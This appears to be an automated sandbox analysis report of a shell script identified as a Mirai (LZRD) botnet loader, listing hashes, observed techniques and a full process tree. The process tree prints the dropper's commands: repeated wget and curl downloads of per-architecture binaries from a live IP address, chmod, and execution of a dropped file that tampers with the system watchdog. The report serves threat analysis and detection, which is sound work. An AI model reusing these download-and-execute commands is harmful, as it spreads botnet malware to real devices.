Analysis
-
max time kernel
149s -
max time network
138s -
platform
debian-9_mips -
resource
debian9-mipsbe-20240418-en -
resource tags
arch:mipsimage:debian9-mipsbe-20240418-enkernel:4.9.0-13-4kc-maltalocale:en-usos:debian-9-mipssystem -
submitted
02-01-2025 04:21
Static task
static1
Behavioral task
behavioral1
Sample
ohshit.sh
Resource
ubuntu1804-amd64-20240729-en
Behavioral task
behavioral2
Sample
ohshit.sh
Resource
debian9-armhf-20240729-en
Behavioral task
behavioral3
Sample
ohshit.sh
Resource
debian9-mipsbe-20240418-en
General
-
Target
ohshit.sh
-
Size
2KB
-
MD5
ed9afc8adb1a34f93090873f6b76ec07
-
SHA1
13b5f418f63a32c61e493995e10e3baa0b02caab
-
SHA256
74c5a35690cad6b7fc66a5c03b772b3d9c8787357685b4180263b927c9b70091
-
SHA512
3ef263bf7ef4cadcc3587d3ef891289cb051087c9d125a74fc8f34f16cda89ca79c2a5ae6f2d0edee3f87855de37af4a594779d6d0d332beade0654e102bd049
Malware Config
Extracted
mirai
LZRD
Extracted
mirai
LZRD
Extracted
mirai
LZRD
Signatures
-
Mirai family
-
File and Directory Permissions Modification 1 TTPs 15 IoCs
Adversaries may modify file or directory permissions to evade defenses.
pid Process 893 chmod 825 chmod 860 chmod 731 chmod 771 chmod 807 chmod 848 chmod 866 chmod 738 chmod 749 chmod 872 chmod 881 chmod 887 chmod 794 chmod 812 chmod -
Executes dropped EXE 15 IoCs
ioc pid Process /tmp/WTF 732 WTF /tmp/WTF 739 WTF /tmp/WTF 751 WTF /tmp/WTF 773 WTF /tmp/WTF 796 WTF /tmp/WTF 808 WTF /tmp/WTF 813 WTF /tmp/WTF 827 WTF /tmp/WTF 849 WTF /tmp/WTF 861 WTF /tmp/WTF 867 WTF /tmp/WTF 873 WTF /tmp/WTF 882 WTF /tmp/WTF 888 WTF /tmp/WTF 894 WTF -
Modifies Watchdog functionality 1 TTPs 2 IoCs
Malware like Mirai modifies the Watchdog to prevent it restarting an infected system.
description ioc Process File opened for modification /dev/watchdog WTF File opened for modification /dev/misc/watchdog WTF -
Writes file to system bin folder 2 IoCs
description ioc Process File opened for modification /sbin/watchdog WTF File opened for modification /bin/watchdog WTF -
resource yara_rule behavioral3/files/fstream-1.dat upx behavioral3/files/fstream-4.dat upx -
description ioc Process File opened for reading /proc/663/cmdline WTF File opened for reading /proc/693/cmdline WTF File opened for reading /proc/699/cmdline WTF File opened for reading /proc/790/cmdline WTF File opened for reading /proc/809/cmdline WTF File opened for reading /proc/846/cmdline WTF File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/698/cmdline WTF File opened for reading /proc/708/cmdline WTF File opened for reading /proc/781/cmdline WTF File opened for reading /proc/847/cmdline WTF File opened for reading /proc/851/cmdline WTF File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/705/cmdline WTF File opened for reading /proc/762/cmdline WTF File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/780/cmdline WTF File opened for reading /proc/802/cmdline WTF File opened for reading /proc/804/cmdline WTF File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/837/cmdline WTF File opened for reading /proc/870/cmdline WTF File opened for reading /proc/890/cmdline WTF File opened for reading /proc/671/cmdline WTF File opened for reading /proc/694/cmdline WTF File opened for reading /proc/700/cmdline WTF File opened for reading /proc/701/cmdline WTF File opened for reading /proc/815/cmdline WTF File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/666/cmdline WTF File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/826/cmdline WTF File opened for reading /proc/827/cmdline WTF File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/863/cmdline WTF File opened for reading /proc/876/cmdline WTF File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/672/cmdline WTF File opened for reading /proc/679/cmdline WTF File opened for reading /proc/742/cmdline WTF File opened for reading /proc/760/cmdline WTF File opened for reading /proc/786/cmdline WTF File opened for reading /proc/838/cmdline WTF File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/428/cmdline WTF File opened for reading /proc/891/cmdline WTF -
System Network Configuration Discovery 1 TTPs 3 IoCs
Adversaries may gather information about the network configuration of a system.
pid Process 734 wget 736 curl 737 cat -
Writes file to tmp directory 28 IoCs
Malware often drops required files in the /tmp directory.
description ioc Process File opened for modification /tmp/wind.arc curl File opened for modification /tmp/wind.mips curl File opened for modification /tmp/wind.arm curl File opened for modification /tmp/wind.ppc curl File opened for modification /tmp/wind.m68k wget File opened for modification /tmp/wind.mpsl wget File opened for modification /tmp/wind.mpsl curl File opened for modification /tmp/wind.ppc wget File opened for modification /tmp/wind.spc curl File opened for modification /tmp/wind.arm wget File opened for modification /tmp/wind.sh4 wget File opened for modification /tmp/wind.x86 wget File opened for modification /tmp/WTF ohshit.sh File opened for modification /tmp/wind.i468 curl File opened for modification /tmp/wind.i686 curl File opened for modification /tmp/wind.arm5 wget File opened for modification /tmp/wind.spc wget File opened for modification /tmp/wind.m68k curl File opened for modification /tmp/wind.sh4 curl File opened for modification /tmp/wind.arm6 curl File opened for modification /tmp/wind.x86 curl File opened for modification /tmp/wind.mips wget File opened for modification /tmp/wind.arc wget File opened for modification /tmp/wind.arm5 curl File opened for modification /tmp/wind.arm6 wget File opened for modification /tmp/wind.x86_64 curl File opened for modification /tmp/wind.arm7 wget File opened for modification /tmp/wind.arm7 curl
Processes
-
/tmp/ohshit.sh/tmp/ohshit.sh1⤵
- Writes file to tmp directory
PID:701 -
/usr/bin/wgetwget http://45.95.169.120/hiddenbin/wind.x862⤵
- Writes file to tmp directory
PID:703
-
-
/usr/bin/curlcurl -O http://45.95.169.120/hiddenbin/wind.x862⤵
- Reads runtime system information
- Writes file to tmp directory
PID:716
-
-
/bin/catcat wind.x862⤵PID:729
-
-
/bin/chmodchmod +x ohshit.sh systemd-private-00c5ead212c44c8388cc35d96eddb655-systemd-timedated.service-mVsvgu wind.x86 WTF2⤵
- File and Directory Permissions Modification
PID:731
-
-
/tmp/WTF./WTF2⤵
- Executes dropped EXE
PID:732
-
-
/usr/bin/wgetwget http://45.95.169.120/hiddenbin/wind.mips2⤵
- System Network Configuration Discovery
- Writes file to tmp directory
PID:734
-
-
/usr/bin/curlcurl -O http://45.95.169.120/hiddenbin/wind.mips2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:736
-
-
/bin/catcat wind.mips2⤵
- System Network Configuration Discovery
PID:737
-
-
/bin/chmodchmod +x ohshit.sh systemd-private-00c5ead212c44c8388cc35d96eddb655-systemd-timedated.service-mVsvgu wind.mips wind.x86 WTF2⤵
- File and Directory Permissions Modification
PID:738
-
-
/tmp/WTF./WTF2⤵
- Executes dropped EXE
- Modifies Watchdog functionality
- Writes file to system bin folder
- Reads runtime system information
PID:739
-
-
/usr/bin/wgetwget http://45.95.169.120/hiddenbin/wind.arc2⤵
- Writes file to tmp directory
PID:743
-
-
/usr/bin/curlcurl -O http://45.95.169.120/hiddenbin/wind.arc2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:744
-
-
/bin/catcat wind.arc2⤵PID:748
-
-
/bin/chmodchmod +x ohshit.sh systemd-private-00c5ead212c44c8388cc35d96eddb655-systemd-timedated.service-mVsvgu wind.arc wind.mips wind.x86 WTF2⤵
- File and Directory Permissions Modification
PID:749
-
-
/tmp/WTF./WTF2⤵
- Executes dropped EXE
PID:751
-
-
/usr/bin/wgetwget http://45.95.169.120/hiddenbin/wind.i4682⤵PID:754
-
-
/usr/bin/curlcurl -O http://45.95.169.120/hiddenbin/wind.i4682⤵
- Reads runtime system information
- Writes file to tmp directory
PID:760
-
-
/bin/catcat wind.i4682⤵PID:770
-
-
/bin/chmodchmod +x ohshit.sh systemd-private-00c5ead212c44c8388cc35d96eddb655-systemd-timedated.service-mVsvgu wind.arc wind.i468 wind.mips wind.x86 WTF2⤵
- File and Directory Permissions Modification
PID:771
-
-
/tmp/WTF./WTF2⤵
- Executes dropped EXE
PID:773
-
-
/usr/bin/wgetwget http://45.95.169.120/hiddenbin/wind.i6862⤵PID:775
-
-
/usr/bin/curlcurl -O http://45.95.169.120/hiddenbin/wind.i6862⤵
- Reads runtime system information
- Writes file to tmp directory
PID:781
-
-
/bin/catcat wind.i6862⤵PID:792
-
-
/bin/chmodchmod +x ohshit.sh systemd-private-00c5ead212c44c8388cc35d96eddb655-systemd-timedated.service-mVsvgu wind.arc wind.i468 wind.i686 wind.mips wind.x86 WTF2⤵
- File and Directory Permissions Modification
PID:794
-
-
/tmp/WTF./WTF2⤵
- Executes dropped EXE
PID:796
-
-
/usr/bin/wgetwget http://45.95.169.120/hiddenbin/wind.x86_642⤵PID:797
-
-
/usr/bin/curlcurl -O http://45.95.169.120/hiddenbin/wind.x86_642⤵
- Reads runtime system information
- Writes file to tmp directory
PID:804
-
-
/bin/catcat wind.x86_642⤵PID:806
-
-
/bin/chmodchmod +x ohshit.sh systemd-private-00c5ead212c44c8388cc35d96eddb655-systemd-timedated.service-mVsvgu wind.arc wind.i468 wind.i686 wind.mips wind.x86 wind.x86_64 WTF2⤵
- File and Directory Permissions Modification
PID:807
-
-
/tmp/WTF./WTF2⤵
- Executes dropped EXE
PID:808
-
-
/usr/bin/wgetwget http://45.95.169.120/hiddenbin/wind.mpsl2⤵
- Writes file to tmp directory
PID:809
-
-
/usr/bin/curlcurl -O http://45.95.169.120/hiddenbin/wind.mpsl2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:810
-
-
/bin/catcat wind.mpsl2⤵PID:811
-
-
/bin/chmodchmod +x ohshit.sh systemd-private-00c5ead212c44c8388cc35d96eddb655-systemd-timedated.service-mVsvgu wind.arc wind.i468 wind.i686 wind.mips wind.mpsl wind.x86 wind.x86_64 WTF2⤵
- File and Directory Permissions Modification
PID:812
-
-
/tmp/WTF./WTF2⤵
- Executes dropped EXE
PID:813
-
-
/usr/bin/wgetwget http://45.95.169.120/hiddenbin/wind.arm2⤵
- Writes file to tmp directory
PID:815
-
-
/usr/bin/curlcurl -O http://45.95.169.120/hiddenbin/wind.arm2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:816
-
-
/bin/catcat wind.arm2⤵PID:823
-
-
/bin/chmodchmod +x ohshit.sh systemd-private-00c5ead212c44c8388cc35d96eddb655-systemd-timedated.service-mVsvgu wind.arc wind.arm wind.i468 wind.i686 wind.mips wind.mpsl wind.x86 wind.x86_64 WTF2⤵
- File and Directory Permissions Modification
PID:825
-
-
/tmp/WTF./WTF2⤵
- Executes dropped EXE
PID:827
-
-
/usr/bin/wgetwget http://45.95.169.120/hiddenbin/wind.arm52⤵
- Writes file to tmp directory
PID:829
-
-
/usr/bin/curlcurl -O http://45.95.169.120/hiddenbin/wind.arm52⤵
- Reads runtime system information
- Writes file to tmp directory
PID:838
-
-
/bin/catcat wind.arm52⤵PID:846
-
-
/bin/chmodchmod +x ohshit.sh systemd-private-00c5ead212c44c8388cc35d96eddb655-systemd-timedated.service-mVsvgu wind.arc wind.arm wind.arm5 wind.i468 wind.i686 wind.mips wind.mpsl wind.x86 wind.x86_64 WTF2⤵
- File and Directory Permissions Modification
PID:848
-
-
/tmp/WTF./WTF2⤵
- Executes dropped EXE
PID:849
-
-
/usr/bin/wgetwget http://45.95.169.120/hiddenbin/wind.arm62⤵
- Writes file to tmp directory
PID:851
-
-
/usr/bin/curlcurl -O http://45.95.169.120/hiddenbin/wind.arm62⤵
- Reads runtime system information
- Writes file to tmp directory
PID:858
-
-
/bin/catcat wind.arm62⤵PID:859
-
-
/bin/chmodchmod +x ohshit.sh systemd-private-00c5ead212c44c8388cc35d96eddb655-systemd-timedated.service-mVsvgu wind.arc wind.arm wind.arm5 wind.arm6 wind.i468 wind.i686 wind.mips wind.mpsl wind.x86 wind.x86_64 WTF2⤵
- File and Directory Permissions Modification
PID:860
-
-
/tmp/WTF./WTF2⤵
- Executes dropped EXE
PID:861
-
-
/usr/bin/wgetwget http://45.95.169.120/hiddenbin/wind.arm72⤵
- Writes file to tmp directory
PID:863
-
-
/usr/bin/curlcurl -O http://45.95.169.120/hiddenbin/wind.arm72⤵
- Reads runtime system information
- Writes file to tmp directory
PID:864
-
-
/bin/catcat wind.arm72⤵PID:865
-
-
/bin/chmodchmod +x ohshit.sh systemd-private-00c5ead212c44c8388cc35d96eddb655-systemd-timedated.service-mVsvgu wind.arc wind.arm wind.arm5 wind.arm6 wind.arm7 wind.i468 wind.i686 wind.mips wind.mpsl wind.x86 wind.x86_64 WTF2⤵
- File and Directory Permissions Modification
PID:866
-
-
/tmp/WTF./WTF2⤵
- Executes dropped EXE
PID:867
-
-
/usr/bin/wgetwget http://45.95.169.120/hiddenbin/wind.ppc2⤵
- Writes file to tmp directory
PID:869
-
-
/usr/bin/curlcurl -O http://45.95.169.120/hiddenbin/wind.ppc2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:870
-
-
/bin/catcat wind.ppc2⤵PID:871
-
-
/bin/chmodchmod +x ohshit.sh systemd-private-00c5ead212c44c8388cc35d96eddb655-systemd-timedated.service-mVsvgu wind.arc wind.arm wind.arm5 wind.arm6 wind.arm7 wind.i468 wind.i686 wind.mips wind.mpsl wind.ppc wind.x86 wind.x86_64 WTF2⤵
- File and Directory Permissions Modification
PID:872
-
-
/tmp/WTF./WTF2⤵
- Executes dropped EXE
PID:873
-
-
/usr/bin/wgetwget http://45.95.169.120/hiddenbin/wind.spc2⤵
- Writes file to tmp directory
PID:875
-
-
/usr/bin/curlcurl -O http://45.95.169.120/hiddenbin/wind.spc2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:876
-
-
/bin/catcat wind.spc2⤵PID:880
-
-
/bin/chmodchmod +x ohshit.sh wind.arc wind.arm wind.arm5 wind.arm6 wind.arm7 wind.i468 wind.i686 wind.mips wind.mpsl wind.ppc wind.spc wind.x86 wind.x86_64 WTF2⤵
- File and Directory Permissions Modification
PID:881
-
-
/tmp/WTF./WTF2⤵
- Executes dropped EXE
PID:882
-
-
/usr/bin/wgetwget http://45.95.169.120/hiddenbin/wind.m68k2⤵
- Writes file to tmp directory
PID:884
-
-
/usr/bin/curlcurl -O http://45.95.169.120/hiddenbin/wind.m68k2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:885
-
-
/bin/catcat wind.m68k2⤵PID:886
-
-
/bin/chmodchmod +x ohshit.sh wind.arc wind.arm wind.arm5 wind.arm6 wind.arm7 wind.i468 wind.i686 wind.m68k wind.mips wind.mpsl wind.ppc wind.spc wind.x86 wind.x86_64 WTF2⤵
- File and Directory Permissions Modification
PID:887
-
-
/tmp/WTF./WTF2⤵
- Executes dropped EXE
PID:888
-
-
/usr/bin/wgetwget http://45.95.169.120/hiddenbin/wind.sh42⤵
- Writes file to tmp directory
PID:890
-
-
/usr/bin/curlcurl -O http://45.95.169.120/hiddenbin/wind.sh42⤵
- Reads runtime system information
- Writes file to tmp directory
PID:891
-
-
/bin/catcat wind.sh42⤵PID:892
-
-
/bin/chmodchmod +x ohshit.sh wind.arc wind.arm wind.arm5 wind.arm6 wind.arm7 wind.i468 wind.i686 wind.m68k wind.mips wind.mpsl wind.ppc wind.sh4 wind.spc wind.x86 wind.x86_64 WTF2⤵
- File and Directory Permissions Modification
PID:893
-
-
/tmp/WTF./WTF2⤵
- Executes dropped EXE
PID:894
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
23KB
MD5d70a9269f912109afaeec442fb967ce6
SHA10d89ccf6cb68f4d5b5f5a29d7f5de04984017b21
SHA2565645309e550ef9e1afad4a0da0f577a3be054aec87122317d8a0a677d47496ab
SHA51259817f04c9902c892b91469b8448431a641ea9e7fcc9fa9e87e317fdee1919d9a063f8bfc88fe90f9e9c40a3362ee2e5611f385c819e21ead39ea6148026e275
-
Filesize
105KB
MD5ea6615b985e2ddd30d65e1293058ddd9
SHA13890c332e3d2167f7a5e279135843d6905324d6b
SHA256c16826f971473f4fa6c23a50c745e747eddc9d7a1e026b0613bb1d2ed24f6c52
SHA512975d87a0c7b876d1fa3c1d832b7cef130e6e32052b9ea90bddc166709a4c1ad3d51f3e60c7120b7b4c15b1829e5d465cbc99bac53efa185201a648113c38f9fc
-
Filesize
217B
MD5b5c5bc11ee843c629fe4dc7b16d9e3c8
SHA1b4f2fc81c39d2c053c55ee06a161655f6546a372
SHA25640e81787af6d49bfd5ff0dd8a740f823899d31ddf509e41b10165b13a8cc6e39
SHA512fe3c0c15734685ad54a0068e56cd4247e7cf4716257d25e1916fc69e2c0d7a490166b3802339fff264e3e4ef86d2d4c156f5866eb931e99dce15ad64c96f1a16
-
Filesize
217B
MD57996ac0d48cf7290dc39acdf4c6cbe78
SHA16949f5ef62883990e34538ee5bfdab36b5ddddde
SHA25696db2cd9e9a66997acbc90e8f591e6b1696bb47500d1d07db2d20e3c92de70a8
SHA5120eb9e26445b177be128aa076110ff2d3488641347c17eef3f2e44b50bb9fe18f4c7fa10cccf2985801fbfd5fcc5c163cf141452850927aa58f623737a9d9488a
-
Filesize
57KB
MD542d86ec69889e6fc6c2709a571d72f24
SHA163a111cf7f0be7930592de0255397594d983c27e
SHA2568aff3837c290a26986a2b1b180a1e8d5d8480a64cfa3b9d6cb0c40fbe8d07f0b
SHA5129067a819685cb60c768808d6e19de31bd7ed9b33d705fe68be3ea9f2f5b1912d8b3ac5252036bb46f033a72378e4bc7c09872972ed4b26d9cb5fbdd422e6d668
-
Filesize
20KB
MD52696d2b99111e232d78a0c9678a3e154
SHA119933c0b1d0b81348c862aaedbda11087b87c874
SHA2563cd86a5cc82976251f617c7ca32d6d0fa5e757a4489f0e60dd1cccff28f8b379
SHA51267a9bd12fe8499665fe2a4ae772f4685744a00bfec1452577236f626ddbd8087956609673a78b514a6e438538f815242c98dff15b83c1b8f4302130ea818b8bb